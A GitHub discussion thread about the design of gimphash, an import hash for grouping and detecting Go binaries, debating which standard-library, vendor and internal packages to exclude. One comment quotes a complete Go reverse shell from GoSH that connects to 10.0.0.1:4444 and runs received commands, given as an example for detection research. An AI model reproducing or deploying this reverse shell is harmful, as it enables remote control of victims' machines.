### DISCUSSION TITLE
What symbols should be part of the hash?

### DISCUSSION THREAD

**Discussion by hillu** [NextronSystems/gimphash#2] [Ideas]
Since the intent is calculating a hash over (meaningful) imported symbols, one could argue that only symbols that are actually exported from their originating module should be taken into account. This would mean ignoring every symbol where the module-local name is not capitalized.

After looking at a few trivial programs, it is clear that even a Hello-World built using Go 1.18 pulls in substantial amounts of code from the standard library:
- debug
- errors
- fmt
- os
- reflect
- runtime
- sort
- strconv
- sync/atomic
- sync
- syscall
- time
- unicode

I think that some of those packages from the standard library should be ignored since they likely offer little distinguishing value and cause instability in the result when the same code base is rebuilt using a different compiler+stdlib version. I'm not quite sure whether to ignore all of the stdlib, but I am pretty sure about at least `sync`, `sync/atomic`, `runtime`, `reflect`, `strconv`, `fmt`, `time`, `unicode`, `unsafe`.

I think there might be value in treating `vendor` directories a bit differently: Package paths that begin with `vendor/` should be stripped because they are part of the standard library. Paths that contain `/vendor/` somewhere in the middle should lose their prefix up to and including `/vendor/`. If some library author has decided to vendor package `foo/bar` into his package `bar/quux`, the resulting name would be `bar/quux/vendor/foo/bar`. Only `foo/bar` is of interest to us, so we should keep that and ignore the rest.

**Comment by secDre4mer** [comment]
Thanks for opening the discussion, @hillu . Selection of the correct symbols will significantly afffect how usable the hash is in the end.


> Since the intent is calculating a hash over (meaningful) imported symbols, one could argue that only symbols that are actually exported from their originating module should be taken into account. This would mean ignoring every symbol where the module-local name is not capitalized.

Would this make a (meaningful) difference? Almost all imported packages will export some symbols that are used; the only exception that comes to my mind are packages that are imported in an `import _ "package/path"` fashion for side effects, like with `net/http/pprof`.

Perhaps, though, we should exclude all packages that contain `internal/` (instead of only those that start with it) since these are internal to other packages and not directly imported.

> Paths that contain /vendor/ somewhere in the middle should lose their prefix up to and including /vendor/. If some library author has decided to vendor package foo/bar into his package bar/quux, the resulting name would be bar/quux/vendor/foo/bar. Only foo/bar is of interest to us, so we should keep that and ignore the rest.

This sounds very helpful. New go versions don't include the `vendor/` directory in the symbol name, but older versions behave as you described. From my testing I believe that that change came in Go 1.13, though there is nothing in the release notes about it.

> I think that some of those packages from the standard library should be ignored since they likely offer little distinguishing value and cause instability in the result when the same code base is rebuilt using a different compiler+stdlib version. I'm not quite sure whether to ignore all of the stdlib, but I am pretty sure about at least sync, sync/atomic, runtime, reflect, strconv, fmt, time, unicode, unsafe.

While I think some "blacklist" with stdlib packages would be helpful, I'd really like to keep it to a minimum. Go's standard library is still expanding, and we won't be able to change the blacklist later on, so it should only be packages that are implicitly included in binaries in my opinion.

Therefore I'd like to modify the suggestion a bit:
 - I don't think `unsafe` is pulled in by the standard library
 - I'm unsure about `reflect` / `strconv` / `fmt`: While these will be used in almost all Go programs, they shouldn't cause instability either
 - `syscall` should be on the list since it's pulled in by all Windows golang binaries
 - `type` is also apparently included by the runtime and should be blacklisted, in case that ever changes

**Reply by hillu** [reply]
> > Since the intent is calculating a hash over (meaningful) imported symbols, one could argue that only symbols that are actually exported from their originating module should be taken into account. This would mean ignoring every symbol where the module-local name is not capitalized.
> 
> Would this make a (meaningful) difference? Almost all imported packages will export some symbols that are used; the only exception that comes to my mind are packages that are imported in an `import _ "package/path"` fashion for side effects, like with `net/http/pprof`.

My general idea was that the hash should stay stable even if some packages change implementation details that don't affect their public-API. (Think `go-yara`'s callback pool journey, for example).

I had not considered the "import for side effects" case, will have to look at the symbol lists for typical examples – `net/http/pprof`, SQL drivers, what else is there?

I agree about removing everything that contains `/internal/`.

Even if you don't want to ignore `strconv`, `fmt`, I have the feeling that `unsafe` and `reflect` are still somewhat in flux across Go releases.

Perhaps we should take a step back and reason about what should keep the hash stable and what should definitely cause changes. (To be honest, so far, I have mostly been thinking about stability.)

**Reply by TcM1911** [reply]
> Thanks for opening the discussion, @hillu . Selection of the correct symbols will significantly afffect how usable the hash is in the end.
> 
> > Since the intent is calculating a hash over (meaningful) imported symbols, one could argue that only symbols that are actually exported from their originating module should be taken into account. This would mean ignoring every symbol where the module-local name is not capitalized.
> 
> Would this make a (meaningful) difference? Almost all imported packages will export some symbols that are used; the only exception that comes to my mind are packages that are imported in an `import _ "package/path"` fashion for side effects, like with `net/http/pprof`.

... which has exported symbols too....

 
> Perhaps, though, we should exclude all packages that contain `internal/` (instead of only those that start with it) since these are internal to other packages and not directly imported.
> 
> > Paths that contain /vendor/ somewhere in the middle should lose their prefix up to and including /vendor/. If some library author has decided to vendor package foo/bar into his package bar/quux, the resulting name would be bar/quux/vendor/foo/bar. Only foo/bar is of interest to us, so we should keep that and ignore the rest.
> 
> This sounds very helpful. New go versions don't include the `vendor/` directory in the symbol name, but older versions behave as you described. From my testing I believe that that change came in Go 1.13, though there is nothing in the release notes about it.

The vendor is still being used. It pulls in `x` packages that are used within the standard library so depending what you import from the std you may get vendor packages.

> 
> > I think that some of those packages from the standard library should be ignored since they likely offer little distinguishing value and cause instability in the result when the same code base is rebuilt using a different compiler+stdlib version. I'm not quite sure whether to ignore all of the stdlib, but I am pretty sure about at least sync, sync/atomic, runtime, reflect, strconv, fmt, time, unicode, unsafe.
> 
> While I think some "blacklist" with stdlib packages would be helpful, I'd really like to keep it to a minimum. Go's standard library is still expanding, and we won't be able to change the blacklist later on, so it should only be packages that are implicitly included in binaries in my opinion.
> 
> Therefore I'd like to modify the suggestion a bit:
> 
>     * I don't think `unsafe` is pulled in by the standard library

It should be needed if cgo is being used. 

> 
>     * I'm unsure about `reflect` / `strconv` / `fmt`: While these will be used in almost all Go programs, they shouldn't cause instability either
> 
>     * `syscall` should be on the list since it's pulled in by all Windows golang binaries
> 
>     * `type` is also apparently included by the runtime and should be blacklisted, in case that ever changes

The issue I would have against blacklisting a lot/all of the std packages is that you can end up with malware that only uses std packages with the same hash as a "Hello World" binary.

**Comment by secDre4mer** [comment]
>My general idea was that the hash should stay stable even if some packages change implementation details that don't affect their public-API. (Think go-yara's callback pool journey, for example).

Isn't this the case anyway? Remember, we don't hash the function names themselves, but only the package names (see step 2.iii). So internal changes will not impact the gimphash, only changes in which packages are built.

> ... which has exported symbols too....

It does, but if those symbols are never referenced, the linker might not include them in the binary. Now that I think of it, that seems fairly unlikely, though - even something like SQL drivers or pprof would have to register callbacks with other packages, and that likely means exported functions that are visible.

So I don't think we need any special casing here, the normal inclusions should do just fine.

> Perhaps we should take a step back and reason about what should keep the hash stable and what should definitely cause changes. (To be honest, so far, I have mostly been thinking about stability.)

I think the following things would be good:
- Changes to a package that do not affect the package's dependencies should not affect the gimphash.
- OS agnostic code (that does not use go:build constraints) should have the same gimphash, regardless of the OS it was compiled for.
- Changes in the compiler version should not affect the gimphash.
- If a package dependency is added or deleted, the gimphash should change.

Further suggestions are welcome. I'd like to include the complete list on the main page as well, since this impacts the symbol selection.

> The vendor is still being used. It pulls in x packages that are used within the standard library so depending what you import from the std you may get vendor packages.

Yes, it is, which is why paths with `vendor/` prefix are currently excluded. I was referring to `my/package/path/vendor/my/dependency` style paths, which were simplified to `my/dependency` in Go 1.13.

> The issue I would have against blacklisting a lot/all of the std packages is that you can end up with malware that only uses std packages with the same hash as a "Hello World" binary.

I agree! There should be some exclusions to fufill the list above (e.g. packages like `runtime/internal` that are compiler version dependent), but I'd like to keep the list to a minimum for that. And if one of those goals is only achievable with a huge blacklist, I'd rather discard the goal than have a huge blacklist.

**Reply by hillu** [reply]
> > My general idea was that the hash should stay stable even if some packages change implementation details that don't affect their public-API. (Think go-yara's callback pool journey, for example).
> 
> Isn't this the case anyway? Remember, we don't hash the function names themselves, but only the package names (see step 2.iii). So internal changes will not impact the gimphash, only changes in which packages are built.

I'm sorry.

Because I first played with the C code thinking of imphash, I must have overlooked the bit where you strip off actual function or method symbols and only keep namespaces. Compared to the original imphash idea, I consider this a step backwards because the algorithm is likely to tell you that binaries are similar simply based upon the packages they import, without considering what functionality of those packages is actually used.

Is there a chance to get you to reconsider that design choice?

**Reply by secDre4mer** [reply]
Sure - this is only a proposal so far, and I'm always open for other ideas on how to best calculate the hash.

Including the full symbols would make the hash far more specific. While this is a good thing in general, I'm a little hesitant on how specific this might end up being. I'll need to experiment a bit with our suggested exclusions and various go versions / targets to see if it's still sufficiently stable to be invariant to smaller changes.

**Reply by hillu** [reply]
I agree that the full symbol list is too specific – features would get lost in the noise. That's why I proposed limiting this to properly exported (capitalized) symbols – and ignoring symbols from some packages.

Have you considered using a locality-sensitive hashing scheme instead of SHA256?

**Reply by secDre4mer** [reply]
I've implemented the symbol list you proposed on the `experimental/fullsymbols` branch. The results are:

 - The results seem to be very compiler version / target specific. Compiling a "hello world" results in a unique hash for most compiler / target combinations.
 - Grouping by hash on our test samples is slightly impacted - there are ~33% less groups with 3+ samples on the same hash - but most groups are unaffected.
 
I assume that package upgrades could also cause a hash change - because new functions were introduced that are also exported - but it's hard to measure how often this occurs in reality. 

From my understanding (I haven't worked with LSH before), a locality sensitive hash might improve recognition in case like compiler / target differences, since most differences there seem minor, but it's also more likely to overlook "important" symbols like `os/exec.Command`. I'm not sure how I like this.

**Comment by Neo23x0** [comment]
> The issue I would have against blacklisting a lot/all of the std packages is that you can end up with malware that only uses std packages with the same hash as a "Hello World" binary.

[GoSH](https://github.com/redcode-labs/GoSH) is a good example.

The reverse shells produced by GoSH use only few imports: 

```
package main

import (
   "bufio"
   "fmt"
   "net"
   "os/exec"
   "os"
   "strings"
   "time"
)

func EnHMkHkV(){
    os.Remove(os.Args[0])
}

func rTKxGPPC(){
    time.Sleep(0*time.Second)
}

func GQZcjjn(conn net.Conn){
    message, _ := bufio.NewReader(conn).ReadString('\n')
    if message == "DELETE\n" {
        EnHMkHkV()
    }
    out, err := exec.Command(strings.TrimSuffix(message, "\n")).Output()
    if err != nil {
        fmt.Fprintf(conn, "%s\n",err)
    }
    fmt.Fprintf(conn, "%s\n",out)
}

func main() {
    rTKxGPPC()
    conn, _ := net.Dial("tcp", "10.0.0.1:4444")
    for {
        GQZcjjn(conn)
    }
}
```

In these cases I'm aware that an Imphash may also match on HelloWorld like simple program that also uses "net", but writing a detection rule, I plan to combine that imphash with e.g. the size of the binary (usually stripped with `-w -c` ldflags) and other characteristics of a file. 

> And if one of those goals is only achievable with a huge blacklist, I'd rather discard the goal than have a huge blacklist.

Exactly.

**Reply by hillu** [reply]
If you replace your example with this empty shell…
``` go
package main

import (
	_ "bufio"
	_ "fmt"
	_ "net"
	_ "os"
	_ "os/exec"
	_ "strings"
	_ "time"
)

func main() {}
```
… it turns out that only one package (`unicode/utf8`) is missing.

Acting on a hunch, I added some junk code back that might require UTF-8-to-UTF-16-recoding…
``` go
package main

import (
	_ "bufio"
	_ "fmt"
	_ "net"
	_ "os"
	"os/exec"
	_ "strings"
	_ "time"
)

func main() {
	if strings.Index("", "") >= -1 {
		exec.Command("")
	}
}
```
… and sure enough, the list of packages (and thus the hash) reported by `gimphash.c` is the same as for the original program. My conclusion is that package names alone add too little information to be useful.

**Reply by secDre4mer** [reply]
> My conclusion is that package names alone add too little information to be useful.

Possibly. However, lots of empty imports does not feel like a credible counter example because it's highly unlikely to occur in the real world. I don't think collisions on the resulting value are that likely (though they will happen, of course), also because with more complex binaries, the list of dependencies grows and therefore the hash becomes more indicative.

What would really be nice (also for evaluating things like your suggestion above regarding full exported symbol names) would be a way to calculate these values across some really large DB (think VT sized) and compare the results to other grouping indicators. This could give us an idea of how common collisions actually are.

**Comment by secDre4mer** [comment]
I've merged `experimental/fullsymbols`: based on the current results, it's more specific and malware still seems to be grouped well by it.

The standard library blacklist might still need tuning.

**Comment by Neo23x0** [comment]
IDK ... I've tested it several times now and compare v1 with the v2 that you guys discussed here: 

![Screenshot 2023-01-26 at 18 10 26](https://user-images.githubusercontent.com/2851492/214903212-133f853e-2d71-4d7b-a8d0-d5c4f34fbe82.png)

To me, the old version v0.1 is less specific, yes, but it serves its purpose. It allows you to pivot to similar samples. 
From what I have tested so far, v0.1 gives me better results. 
But that view may be tainted, since we don't know how they perform on a a huge dataset like that of VT.
